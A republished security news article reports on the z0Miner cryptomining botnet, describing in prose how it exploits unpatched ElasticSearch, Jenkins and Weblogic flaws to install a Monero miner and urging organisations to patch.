Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Cryptomining Botnet Targets Unpatched Vulnerabilities in Cloud Servers

Attackers often keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers by exploiting a new set of unpatched vulnerabilities.

z0Miner active campaign

Qihoo 360 Netlab researchers have observed z0Miner’s active hunting against vulnerabilities addressed in 2015 and earlier in ElasticSearch and Jenkins servers.

  • The botnet was using exploits targeting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers.
  • After compromising a server, the malware will first download a malicious shell script and sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin.
  • Further, the botnet downloads a mining kit containing an XMRig miner script (java.exe), a config file (config.json), and a starter script (solr.sh). It starts to mine for Monero (XMR) cryptocurrency in the background.

Earlier campaigns

Since its emergence last year, z0Miner has been observed gaining persistence via crontab and mining for Monero cryptocurrency.

  • According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices.
  • In addition, the botnet was spreading laterally on the network of already compromised devices via SSH.
  • It has already compromised thousands of devices using recently identified similar attack logic.

Conclusion

z0Miner’s recent campaign demonstrates how vulnerabilities identified years ago, if not patched, can be used by cybercriminals for making a profit. Therefore, it becomes important for organizations to keep all their systems and applications updated with the latest patches to avoid such threats.

Source: https://cyware.com/news/cryptomining-botnet-targets-unpatched-vulnerabilities-in-cloud-servers-29f9f8a3

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO